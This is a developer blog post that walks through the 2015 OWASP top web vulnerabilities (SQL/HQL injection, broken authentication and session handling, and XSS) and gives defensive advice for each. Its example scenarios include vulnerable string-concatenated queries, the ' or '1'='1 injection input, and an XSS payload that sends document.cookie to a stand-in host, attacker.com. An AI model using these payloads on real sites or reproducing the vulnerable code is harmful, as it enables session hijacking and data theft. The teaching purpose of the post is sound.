Web security doesn’t always get the attention that it deserves. That is unfortunate because it leaves companies and their customers vulnerable to an array of cyber attacks. I wrote an article about How and Why companies are Hacked last week and received some emails suggesting that I outline some of the most popular cyber attacks in 2015 and how to avoid them.
This sounded like a great idea to me, so I decided to accept the challenge and do my best to lay out the top 3 web security vulnerabilities for 2015 and how you might be able to secure yourself against them on your site.
For all too many companies, it’s not until after a breach has occurred that web security becomes a priority. During my years working as a web developer, I have seen time and time again how obscure the world of IT Security is to so many of my fellow programmers.
An effective approach to IT security must, by definition, be proactive and defensive. Toward that end, this post is aimed at sparking a security mindset, hopefully injecting the reader with a healthy dose of paranoia. That being said, here are the top 3 (in order) web security vulnerabilities in 2015.
Injection flaws, such as SQL, OS, and LDAP injection occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.
Example Attack Scenarios
Scenario #1: The application uses untrusted data in the construction of the following vulnerable SQL call:
String query = "SELECT * FROM accounts WHERE custID='" + request.getParameter("id") + "'";
Scenario #2: Similarly, an application’s blind trust in frameworks may result in queries that are still vulnerable, (e.g., Hibernate Query Language (HQL)):
Query HQLQuery = session.createQuery(“FROM accounts WHERE custID='“ + request.getParameter("id") + "'");
In both cases, the attacker modifies the ‘id’ parameter value in her browser to send: ‘ or ‘1’=’1. For example:
This changes the meaning of both queries to return all the records from the accounts table. More dangerous attacks could modify data or even invoke stored procedures.
Are You Vulnerable To Injection Attacks?
The best way to find out if an application is vulnerable to injection is to verify that all use of interpreters clearly separates untrusted data from the command or query. For SQL calls, this means using bind variables in all prepared statements and stored procedures, and avoiding dynamic queries.
Checking the code is a fast and accurate way to see if the application uses interpreters safely. Code analysis tools can help a security analyst find the use of interpreters and trace the data flow through the application. Penetration testers can validate these issues by crafting exploits that confirm the vulnerability.
Automated dynamic scanning which exercises the application may provide insight into whether some exploitable injection flaws exist. Scanners cannot always reach interpreters and have difficulty detecting whether an attack was successful. Poor error handling makes injection flaws easier to discover.
How To Protect Yourself From Injection Attacks
Preventing injection requires keeping untrusted data separate from commands and queries.
- The preferred option is to use a safe API which avoids the use of the interpreter entirely or provides a parameterized interface. Be careful with APIs, such as stored procedures, that are parameterized, but can still introduce injection under the hood.
- If a parameterized API is not available, you should carefully escape special characters using the specific escape syntax for that interpreter. OWASP’s ESAPI provides many of these escaping routines.
- Positive or “white list” input validation is also recommended, but is not a complete defense as many applications require special characters in their input. If special characters are required, only approaches 1. and 2. above will make their use safe. OWASP’s ESAPI has an extensible library of white list input validation routines.
2. Broken Authentication and Session Management
Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities.
Example Attack Scenarios
Scenario #1: Airline reservations application supports URL rewriting, putting session IDs in the URL:
An authenticated user of the site wants to let his friends know about the sale. He e-mails the above link without knowing he is also giving away his session ID. When his friends use the link they will use his session and credit card.
Scenario #2: Application’s timeouts aren’t set properly. User uses a public computer to access site. Instead of selecting “logout” the user simply closes the browser tab and walks away. Attacker uses the same browser an hour later, and that browser is still authenticated.
Scenario #3: Insider or external attacker gains access to the system’s password database. User passwords are not properly hashed, exposing every users’ password to the attacker.
Are You Vulnerable To Broken Authentication Attacks?
The first thing you should ask yourself is “Are session management assets like user credentials and session IDs properly protected?” You may be vulnerable if:
- User authentication credentials aren’t protected when stored using hashing or encryption.
- Credentials can be guessed or overwritten through weak account management functions (e.g., account creation, change password, recover password, weak session IDs).
- Session IDs are exposed in the URL (e.g., URL rewriting).
- Session IDs are vulnerable to session fixation attacks.
- Session IDs don’t timeout, or user sessions or authentication tokens, particularly single sign-on (SSO) tokens, aren’t properly invalidated during logout.
- Session IDs aren’t rotated after successful login.
- Passwords, session IDs, and other credentials are sent over unencrypted connections.
How To Protect Yourself
The primary recommendation for an organization is to make available to developers:
- A single set of strong authentication and session management controls. Such controls should strive to:
- meet all the authentication and session management requirements defined in OWASP’s Application Security Verification Standard (ASVS) areas V2 (Authentication) and V3 (Session Management).
- have a simple interface for developers. Consider the ESAPI Authenticator and User APIs as good examples to emulate, use, or build upon.
- Strong efforts should also be made to avoid XSS flaws which can be used to steal session IDs.
3. Cross-Site Scripting (XSS)
XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
Example Attack Scenarios
The application uses untrusted data in the construction of the following HTML snippet without validation or escaping:
(String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";
The attacker modifies the ‘CC’ parameter in their browser to:
'>document.location= 'http://www.attacker.com/cgi-bin/cookie.cgi ?foo='+document.cookie'.
This causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session.
Note that attackers can also use XSS to defeat any automated CSRF defense the application might employ.
Are You Vulnerable to XSS Attacks?
Web 2.0 technologies, such as Ajax, make XSS much more difficult to detect via automated tools.
Tips on Preventing XSS Attacks
Preventing XSS requires separation of untrusted data from active browser content.
- Positive or “whitelist” input validation is also recommended as it helps protect against XSS, but is not a complete defenseas many applications require special characters in their input. Such validation should, as much as possible, validate the length, characters, format, and business rules on that data before accepting the input.
- For rich content, consider auto-sanitization libraries like OWASP’s AntiSamy or the Java HTML Sanitizer Project.
- Consider Content Security Policy (CSP) to defend against XSS across your entire site.
Hopefully this has shed just a tiny bit of light on some things you should be looking at when you are developing a public web application. There are many more types of attacks that can do just as much or more harm than the ones listed above. For a list of these attacks (and how I curated these) can be found at https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project. They keep an updated list of the most common attacks and things you should keep in mind if you are developing a secure web application.
One bonus tip for reading this far is a GREAT web resource that identifies flaws in any web endpoint. The web application can be found at https://asafaweb.com/. This tools simply issues a few HTTP requests to the URL to be scanned. ASafaWeb doesn’t attempt any attack sequences or other malicious activity, it simply makes some benign requests and see how the site responds. You’ll see what each of these look like after submitting the scan. I highly recommend that you check it out and take a look at some suggestions that it might make about securing your website.
Well that is all from me today. I Hope everyone had a good Halloween over the weekend. Please leave me any comments that you have involving your web security recommendations and I’ll be sure to check them out!
If you like this post please share it or ‘like’ it to spread the work to other developers. If you never want to miss one of my posts then subscribe to my newsletter at jasonroell.com.